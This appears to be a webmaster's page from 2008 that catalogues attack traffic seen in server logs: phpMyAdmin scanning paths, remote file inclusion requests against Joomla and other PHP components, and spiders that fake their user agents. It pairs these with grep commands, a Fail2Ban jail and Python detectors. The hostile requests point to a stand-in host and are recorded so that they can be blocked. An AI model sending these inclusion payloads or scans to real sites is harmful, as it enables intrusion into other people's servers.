GET /sql/sql/main.php
GET /sql/sqladmin/main.php
GET /sql/sqlmanager/main.php
GET /sql/sqlweb/main.php
GET /sql/web/main.php
GET /sql/webadmin/main.php
GET /sql/webdb/main.php
GET /sql/websql/main.php
GET /sqlmanager/main.php
GET /sqlweb/main.php
GET /typo3/phpmyadmin/read_dump.phpmain.php
GET /web/main.php
GET /web/phpMyAdmin/read_dump.phpmain.php
GET /webadmin/main.php
GET /webdb/main.php
GET /websql/main.php
GET /xampp/phpmyadmin/read_dump.phpmain.php
This is why we don't allow people to install web-based database admin interfaces.
libwww-perl Remote File Inclusion Exploit
These attacks come from a network of infected servers and target a wide range of open source PHP applications or modules.
GET /.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=http://www.example.net/badfile.txt??
GET /?_REQUEST=&_REQUEST%5boption%5d=com_articles&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.example.net/badfile.txt?
GET /[Scriptftp://ftp.example.net/incoming/upload/trec/oldbisok??
GET /[Scripthttp://www.example.net/badfile.jpg?
GET /[Scripthttp://xxxxxx.xxxxx.xxx.gif?
GET /admin.php?include_path=http://www.example.net/badfile.txt?
GET /admin/config.inc.php?include_path=http://www.example.net/badfile.txt?
GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.example.net/badfile.txt???
GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=CMD?
GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.example.net/badfile.txt??
GET /auction/includes/converter.inc.php?include_path=http://www.example.net/badfile.txt?????
GET /auction/includes/messages.inc.php?include_path=http://www.example.net/badfile.txt?????
GET /auction/includes/settings.inc.php?include_path=http://www.example.net/badfile.txt?????
GET /calendar.php?s=http://www.example.net/badfile.txt??
GET /com_galleria/galleria.html.phpmosConfig_absolute_path=http://www.example.net/badfile.txt??
GET /common.inc.php?base_path=http://www.example.net/badfile.txt?
GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.example.net/badfile.txt?&cmd=id????????
GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.example.net/badfile.txt??
GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http:/www.example.net/badfile.txt??
GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.example.net/badfile.txt??
GET /components/com_forum/download.php?phpbb_root_path=http://www.example.net/badfile.txt?
GET /components/com_forum/download.php?phpbb_root_path=http://www.example.net/badfile.txt??
GET /components/com_forum/download.php?phpbb_root_path=http://www.example.net/badfile.txt????????
GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.example.net/badfile.txt?
GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.example.net/badfile.txt??
GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.example.net/badfile.txt???
GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.example.net/badfile.txt????????
GET /components/com_hashcash/server.php?mosConfig_absolute_path=http://www.example.net/badfile.txt??
GET /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.example.net/badfile.txt?
GET /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.example.net/badfile.txt??
GET /components/com_joomlaboard/file_upload.php?sbp=http://www.example.net/badfile.txt?
GET /components/com_joomlaboard/file_upload.php?sbp=http://www.example.net/badfile.txt??
GET /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.example.net/badfile.txt?
GET /components/com_magazine/magazine.html.php?mosConfig_absolute_path=http://www.example.net/badfile.txt???
GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.example.net/badfile.txt?
GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.example.net/badfile.txt??
GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.example.net/badfile.txt???
GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.example.net/badfile.txt?
GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.example.net/badfile.txt??
GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.example.net/badfile.txt???
GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.example.net/badfile.txt?????
GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.example.net/badfile.txt??
GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.example.net/badfile.txt??
GET /components/com_simpleboard/image_upload.php?sbp=http://www.example.net/badfile.txt?
GET /components/com_simpleboard/image_upload.php?sbp=http://www.example.net/badfile.txt??
GET /components/com_simpleboard/image_upload.php?sbp=http://www.example.net/badfile.txt???
GET /components/com_simpleboard/image_upload.php?sbp=http://www.example.net/badfile.txt????????
GET /components/com_simpleboard/image_upload.php?sbp=http:/www.example.net/badfile.txt??
GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.example.net/badfile.txt??
GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.example.net/badfile.txt?
GET /default/theme.php?THEME_DIR=http://www.example.net/badfile.txt?
GET /docs//index.php?_REQUEST=&_REQUEST[option]=com_fireboard&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.example.net/badfile.txt?
GET /errors.php?error= www.example.net/badfile.txt??
GET /errors.php?error=http://www.example.net/badfile.txt?
GET /errors.php?error=http://www.example.net/badfile.txt???
GET /guestbook/admin.php?include_path=http://www.example.net/badfile.txt?
GET /index.php?_REQUEST=&_REQUEST[option]=com_fireboard&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.example.net/badfile.txt?
GET /index.php?mosConfig_absolute_path=http://www.example.net/badfile.txt?
GET /index.php?option=com_extcalendar&Itemid=&mosConfig_absolute_path=http://www.example.net/badfile.txt?
GET /index.php?option=com_extcalendar&Itemid=&mosConfig_absolute_path=http://www.example.net/badfile.txt?????
GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=CMD?
GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.example.net/badfile.txt?
GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.example.net/badfile.txt??
GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.example.net/badfile.txt???
GET /index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.example.net/badfile.txt?
GET /index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.example.net/badfile.txt???
GET /index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.example.net/badfile.txt????
GET /index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.example.net/badfile.txt?
GET /index.php?page=http://www.example.net/badfile.txt?
GET /index.php?page=http:/www.example.net/badfile.txt??
GET /index.php?theme=http://www.example.net/badfile.txt?
GET /members/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.example.net/badfile.txt??
GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.example.net/badfile.txt??
GET /modules/My_eGallery/index.php?basepath=http://www.example.net/badfile.txt???
GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.example.net/badfile.txt??
GET /modules/mod_calendar.php?absolute_path=http://www.example.net/badfile.txt??
GET /phpshop/?page=shop/flypage&product_id=http://www.example.net/badfile.txt?
GET /sendstudio/admin/includes/createemails.inc.php?ROOTDIR=http://www.example.net/badfile.txt?
GET /show.php?path=http://www.example.net/badfile.txt?
GET /show.php?path=http://www.example.net/badfile.txt??
GET /skins/advanced/advanced1.php?pluginpath[0]=http://www.example.net/badfile.txt??
GET /source/mod/rss/post.php?Codebase=http://www.example.net/badfile.txt??
GET /source/mod/rss/view.php?Codebase=http://www.example.net/badfile.txt??
GET /themes//default/theme.php?THEME_DIR=http://www.example.net/badfile.txt?
GET /tools/send_reminders.php?includedir=http://www.example.net/badfile.txt??
GET /tools/send_reminders.php?noSet=0&includedir=http://www.example.net/badfile.txt?
GET /tools/send_reminders.php?noSet=0&includedir=http://www.example.net/badfile.txt??
GET /tools/send_reminders.php?noSet=0&includedir=http://www.example.net/badfile.txt???
This is why we don't allow people to install large open source PHP applications. There are simply too many 'unknowns' and the code is often unmanageable. You would think after all this time that there would be a secure framework for PHP applications, but apparently people are still more interested in features than security.
You can block a lot of these attacks by using mod_rewrite to block the libwww-perl user agent, but unfortunately not all bots are so stupid and many will disguise themselves as generic web browsers.
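Because the user agent can be faked, it is more reliable to look at the request itself: every request in the list above passes a remote URL as a parameter value. The following is an added example, not part of the original page, that flags such request lines regardless of user agent. The function names are hypothetical and the sample requests are copied from the list on this page.

```python
from collections import Counter
from urllib.parse import parse_qsl

# Values starting with a URL scheme mark the requests listed above;
# "http:/" also catches the malformed single-slash form seen in the list.
REMOTE_PREFIXES = ("http:/", "https:/", "ftp:/")

def remote_include_params(request_line):
    """Return [(name, value)] for query parameters that point at a remote URL."""
    parts = request_line.split()
    if len(parts) < 2:
        return []
    _, _, query = parts[1].partition("?")
    # parse_qsl percent-decodes names and values, so config%5broot_dir%5d
    # and an encoded http%3A%2F%2F are seen in their decoded form.
    return [(name, value)
            for name, value in parse_qsl(query, keep_blank_values=True)
            if value.lower().startswith(REMOTE_PREFIXES)]

def targeted_parameters(request_lines):
    """Count how often each parameter name carried a remote URL."""
    counts = Counter()
    for line in request_lines:
        counts.update(name for name, _ in remote_include_params(line))
    return counts

# Request lines copied from the list on this page.
SAMPLE_REQUESTS = [
    "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=CMD?",
    "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.example.net/badfile.txt??",
    "GET /index.php?page=http:/www.example.net/badfile.txt??",
    "GET /members/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.example.net/badfile.txt??",
    "GET /skins/advanced/advanced1.php?pluginpath[0]=http://www.example.net/badfile.txt??",
    "GET /tools/send_reminders.php?noSet=0&includedir=http://www.example.net/badfile.txt?",
]

if __name__ == "__main__":
    for name, count in targeted_parameters(SAMPLE_REQUESTS).most_common():
        print(f"{count:3d}  {name}")
```

Parameters that legitimately carry a URL, such as a redirect target, will also match, so treat the output as a list to review rather than an automatic block list.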
Multiple Personality Spidering
This one is not so much an attack or exploit as a poorly-disguised spidering rampage. A single IP address will completely spider a website - ignoring robots.txt and other instructions for robots - with each subsequent request using a random selection from the following user agents:
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET)
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
The most recent visitors (3 April 2008) with this hit pattern are from 64.223.229.*, 78.88.183.*, 82.59.216.* and 83.165.4.*.
To help identify them in your logs, use the following:
grep "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7" combined_log | awk '{print $1}' | sort | uniq -c | sort -n
But they seem to only index one website from a given IP address and then not return, so it's probably some kind of 'download manager'. Unless you can identify them at the start of a run there's not much you can do about blocking them.
More Faked User Agents
And here's another contender for the most confused spider. This one visited the server between 13:51 and 13:54 GMT on 10 April 2008 from adsoft-development.com (a known spammer) with the following user agents being used in quick succession:
Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt; MRA 4.0 (build 00768))
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.1 (build 00975))
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MyIE2; MRA 4.4 (build 01348))
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://www.tropicdesigns.net)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50
Mozilla/5.0 (Windows NT 5.1; U) Opera 7.54 [ru]
Mozilla/5.0 (compatible; Googlebot/2.1;+http://www.google.com/bot.html)
Yes, that's right, someone thinks it's a good idea to spoof Googlebot!!! You can tell them apart from the 'real' Googlebot by the missing space after the second semicolon.
grep "Googlebot/2.1;+" combined_log | awk '{print $1}' | sort | uniq -c | sort -n
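The grep commands in this section and in "Multiple Personality Spidering" each look for one known user agent. As an added example that is not part of the original page, the script below reads a combined-format log and reports any IP address that used several different user agents, as well as any that sent the spoofed Googlebot string. The function name and the threshold of three agents are assumptions, and the log lines are constructed using documentation addresses.

```python
import re
from collections import defaultdict

# Apache combined format: ip ident user [time] "request" status bytes "referer" "agent"
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[^"]*" \d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"$')
# The spoofed agent on this page lacks the space that follows "Googlebot/2.1;".
SPOOFED_GOOGLEBOT = "Googlebot/2.1;+"

def suspicious_clients(lines, min_agents=3):
    """Return {ip: [flags]} for IPs that rotate agents or send the spoofed Googlebot."""
    agents = defaultdict(set)
    for line in lines:
        match = COMBINED.match(line.strip())
        if match:
            agents[match.group("ip")].add(match.group("ua"))
    report = {}
    for ip, seen in agents.items():
        flags = []
        if len(seen) >= min_agents:  # threshold is an assumption; tune per site
            flags.append("rotating-agents")
        if any(SPOOFED_GOOGLEBOT in ua for ua in seen):
            flags.append("spoofed-googlebot")
        if flags:
            report[ip] = flags
    return report

# Constructed log lines; the user agents are taken from the lists on this page.
LINE = '{ip} - - [03/Apr/2008:10:00:{s:02d} +0000] "GET /p{s}.html HTTP/1.1" 200 512 "-" "{ua}"'
AGENTS = [
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)",
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7",
]
SAMPLE_LOG = [LINE.format(ip="192.0.2.44", s=i, ua=AGENTS[i % 3]) for i in range(6)]
SAMPLE_LOG += [
    LINE.format(ip="198.51.100.9", s=7,
                ua="Mozilla/5.0 (compatible; Googlebot/2.1;+http://www.google.com/bot.html)"),
    LINE.format(ip="203.0.113.20", s=8, ua=AGENTS[0]),  # ordinary single-agent visitor
]

if __name__ == "__main__":
    for ip, flags in suspicious_clients(SAMPLE_LOG).items():
        print(ip, ", ".join(flags))
```

An address shared by many users (a proxy or NAT gateway) will also show several agents, so check the request pattern before blocking on this flag alone.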
More PHP Database Exploits
This one showed up 10 April 2008 from *.hosting365.ie attacking a number of websites in two waves at 05:10 and 16:48 GMT. The following files were requested:
/3rdparty/phpmyadmin/main.php
/PMA/main.php
/PMA2005/main.php
/PMA2006/main.php
/acp/phpmyadmin/main.php
/admin/main.php
/admin/phpMyAdmin/main.php
/admin/phpmyadmin/main.php
/admin/pma/main.php
/admincp/phpmyadmin/main.php
/administrator/phpmyadmin/main.php
/administrator/pma/main.php
/apache/phpmyadmin/main.php
/apps/phpmyadmin/main.php
/beheer/php/main.php
/beheer/phpadmin/main.php
/beheer/phpmyadmin/main.php
/beheertools/phpmyadmin/main.php
/controlpanel/phpmyadmin/main.php
/controlpanel/pma/main.php
/databasepma/main.php
/db/main.php
/db/phpmyadmin/main.php
/db/pma/main.php
/dbadmin/main.php
/debug/phpmyadmin/main.php
/domeinbeheer/phpmyadmin/main.php
/domeinbeheer/pma/main.php
/frontend/phpmyadmin/main.php
/frontend/pma/main.php
/htdocs/phpmyadmin/main.php
/html/phpmyadmin/main.php
/joomla/phpmyadminmain.php
/lamp/phpmyadmin/main.php
/lamp/pma/main.php
/lampp/phpmyadmin/main.php
/lampp/pma/main.php
/myadmin/main.php
/mysql-admin/main.php
/mysql/main.php
/mysqladmin/main.php
/mysqlmanager/main.php
/mysqltool/main.php
/neu/phpmyadmin/main.php
/neu/pma/main.php
/new/phpmyadmin/main.php
/new/pma/main.php
/online/phpmyadmin/main.php
/online/pma/main.php
/open/phpmyadmin/main.php
/open/pma/main.php
/p/m/a/main.php
/php-my-admin/main.php
/php-myadmin/main.php
/phpMyAdmin-2/main.php
/phpMyAdmin/main.php
/phpMyAdmin2/main.php
/phpadmin/main.php
/phpmanager/main.php
/phpmy-admin/main.php
/phpmyadmin/main.php
/phpmyadmin1/main.php
/phpmyadmin2/main.php
/pma2005/main.php
/pma2006/main.php
/pmadb/main.php
/sample/pma/main.php
/samples/phpmyadmin/main.php
/samples/pma/main.php
/securecontrolpanel/phpmyadmin/main.php
/securecontrolpanel/pma/main.php
/service/phpmyadmin/main.php
/service/pma/main.php
/setup/phpmyadmin/main.php
/setup/pma/main.php
/sql/main.php
/sqladmin/main.php
/sqldb/main.php
/sqlmanager/main.php
/sqlweb/main.php
/staff/phpmyadmin/main.php
/staff/pma/main.php
/test/phpmyadmin/main.php
/test/pma/main.php
/tests/phpmyadmin/main.php
/tests/pma/main.php
/tools/phpmyadmin/main.php
/tools/pma/main.php
/typo3/pma/main.php
/uni/phpmyadmin/main.php
/webadmin/main.php
/webdb/main.php
/websql/main.php
/www/phpmyadmin/main.php
/xampp/phpmyadmin/main.php
This is clearly a variant of the first entry on this page. Further examination shows that an identical attack came on the same day from an IP address in France - from the domain *.ikoula.com.
Another reminder why you should never install a PHP database interface on a live web server!
Blocking PHP Exploit Attempts using Fail2Ban
You won't be seeing such detailed reports any more on this page as a new Fail2Ban "jail" seems to block them quite effectively. If you're using Debian you can simply copy the following to the Fail2Ban configuration files. On other systems some of the paths might have to be changed.
Add to /etc/fail2ban/jail.conf.local:
[php-exploits]
enabled = true
port = http
filter = php-exploits
logpath = /var/log/apache/error.log
maxretry = 6
And create a file /etc/fail2ban/filter.d/php-exploits.conf with the following:
[Definition]
failregex = [[]client <HOST>[]] File does not exist: .*\.php
ignoreregex =
Here's a quick introduction for those not yet familiar with Fail2Ban and iptables. The configuration above works on Debian GNU/Linux running Fail2Ban 0.7.5 which is slightly different from the version described in that article.
What it does is monitor the Apache error.log and when six (6) requests are made from the same IP address for non-existent files containing a .php extension, that IP address is automatically blocked using iptables for a set period of time.
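To see which log lines the filter counts before enabling the jail, the failregex can be run against sample error.log lines. This is an added example, not part of the original page and not Fail2Ban's own code: it replaces <HOST> with a simplified IPv4-only pattern (an assumption), ignores the time window over which Fail2Ban counts failures, and uses constructed log lines with documentation addresses.

```python
import re
import warnings
from collections import Counter

# failregex and maxretry copied from the jail and filter on this page.
FAILREGEX = r"[[]client <HOST>[]] File does not exist: .*\.php"
MAXRETRY = 6

# Simplified IPv4-only stand-in for Fail2Ban's own <HOST> expansion (assumption).
HOST_PATTERN = r"(?P<host>\d{1,3}(?:\.\d{1,3}){3})"

def compile_failregex(failregex=FAILREGEX):
    with warnings.catch_warnings():
        # "[[]" is valid but makes newer Pythons warn about nested sets.
        warnings.simplefilter("ignore", FutureWarning)
        return re.compile(failregex.replace("<HOST>", HOST_PATTERN))

def hosts_to_ban(lines, maxretry=MAXRETRY):
    """Return {host: failures} for hosts with at least maxretry matching lines."""
    regex = compile_failregex()
    failures = Counter()
    for line in lines:
        match = regex.search(line)
        if match:
            failures[match.group("host")] += 1
    return {host: n for host, n in failures.items() if n >= maxretry}

# Constructed Apache error.log lines (documentation addresses, not real traffic).
PREFIX = "[Thu Apr 10 05:10:0{} 2008] [error] [client {}] File does not exist: /var/www{}"
SCAN_PATHS = ["/PMA/main.php", "/PMA2005/main.php", "/admin/main.php",
              "/db/main.php", "/mysql/main.php", "/phpmyadmin/main.php"]
SAMPLE_LOG = [PREFIX.format(i, "192.0.2.10", p) for i, p in enumerate(SCAN_PATHS)]
SAMPLE_LOG += [
    # Missing non-PHP files are ignored by the filter.
    PREFIX.format(7, "198.51.100.7", "/favicon.ico"),
    PREFIX.format(8, "198.51.100.7", "/robots.txt"),
    # One mistyped PHP link stays below maxretry.
    PREFIX.format(9, "203.0.113.5", "/contact.php"),
]

if __name__ == "__main__":
    for host, count in hosts_to_ban(SAMPLE_LOG).items():
        print(f"ban {host} after {count} matching lines")
```

The pattern is not anchored at the end of the line, so a missing file such as old.php.bak is counted as well.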